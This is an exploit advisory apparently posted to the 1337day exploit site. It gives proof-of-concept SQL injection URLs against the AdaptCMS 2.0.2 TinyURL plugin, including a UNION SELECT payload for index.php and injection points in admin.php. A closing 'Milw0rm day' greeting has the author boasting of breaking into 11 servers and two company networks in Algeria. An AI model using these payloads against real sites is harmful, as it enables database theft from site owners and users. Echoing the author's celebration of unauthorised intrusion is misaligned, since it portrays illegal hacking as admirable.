AdaptCMS version 2.0.2 (TinyURL) suffers from multiple remote SQL injection vulnerabilities.
ecc9c9dc887b3df0475b0f5e46b2f86ca3d6efa6d62a9d722afa1e8502476d61
# Happy Milw0rm 1337 Day!!! Congratulations all h4x0rz
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : AdaptCMS v2.0.2 (TinyURL) Multiple SQL Injection Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : https://fb.me/Inj3ct0rK3d
# platform : php
# Type : SQLi - Remote -
# Security Risk : Critical
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10
# Download : [https://sourceforge.net/projects/adaptcms/files/AdaptCMS%202.x/2.0.x/AdaptCMS_2.0.2.zip/download]
###
# +> Exploit
<-- p0c1 (index.php) -->
/index.php?view=plugins&plugin=tinyurl&module=go&id= [ + SQL Injection Code + ]
/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--
<-- p0c2 (admin.php) -->
admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]
admin.php?view=plugins&do=load&plugin=tinyurl&page= [ + SQL Injection Code + ]
############# << ThE|End
# -- Hackers day and legend story: -- #
# ---- ( Milw0rm - Old School - ) ---- #
-- Hi all HaCkers !
- Happy milw0rm 1337 DAY (leet-day) for all Hax0rS ../pene-testers ../and all Inj3ct0r users (^_^)
- Today is a biiiiiiiiiiig day about History and Legend for Hacking/Pene-Testing ...
- this Day about Created and Started a legend Milw0rm (https://en.wikipedia.org/wiki/Milw0rm)
- if you a Hax0r 0r Pene-Tester ,s0 you'r know about this day and this team (milw0rm)...
- milw0rm is change my life, and our live, and inj3ct0r keep the milw0rm project and target a live <3
- So....! what you doing in this big day .....!!?
- I'm busy with work ( Mechanical of drilling-rig :p ) xD
- but i do my real job ( Penetration Testing & Hacking & pWn'd ) <3
- my Results in this day (++ i'm very busy)
- Hacking 11 servers and get RDP/local r00t ..etc..
- Hacking 2 big Networks of some Companies Here in Hassi Messaoud (Algeria)
- Discovering some vulners/bug's and make exploit/p0c ( Pene-Testing <3 <3 ^.^ )
++ and...and...and...
- !(o_O) and you ... whats a hax0r with n't Hacking in this Day !!?
<- Wishes/Greetings t0 all Milw0rm 1337 cr3w ( 0ld School )->
Keystroke, JF, ExtreemUK, savec0re, VeNoMouS
<- Wishes/Greetings t0 All Inj3ct0r 1337day cr3w ->
r0073r, Sid3^effectS, r4dc0re, CrosS, KedAns-Dz (me :p), Indoushka
KnocKout, SeeMe, Kalashinkov3, ZoRLu, anT!-Tr0J4n, Angel Injection, NuxbieCyber
<- Wishes/Greetings t0 All Algerian 1337 Hax0rS ->
Inj3ct0rs Dz: KedAns (me), Indoushka, Kalashinkov3
Caddy-Dz, Jago-dz, Kha&miX, Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Over-X
Soucha, Chevr0sky, Black-ID, BrOx-Dz, Lagripe-dz, Ma3sTr0-Dz, Barbaros DZ, Dr.Ride
...All OthErS and All mY Friends ^.^ ! Happy Milw0rm 1337 Day !!!!!!
# ./KedAns-Dz (1, 2, 3,.. viva l'algerie)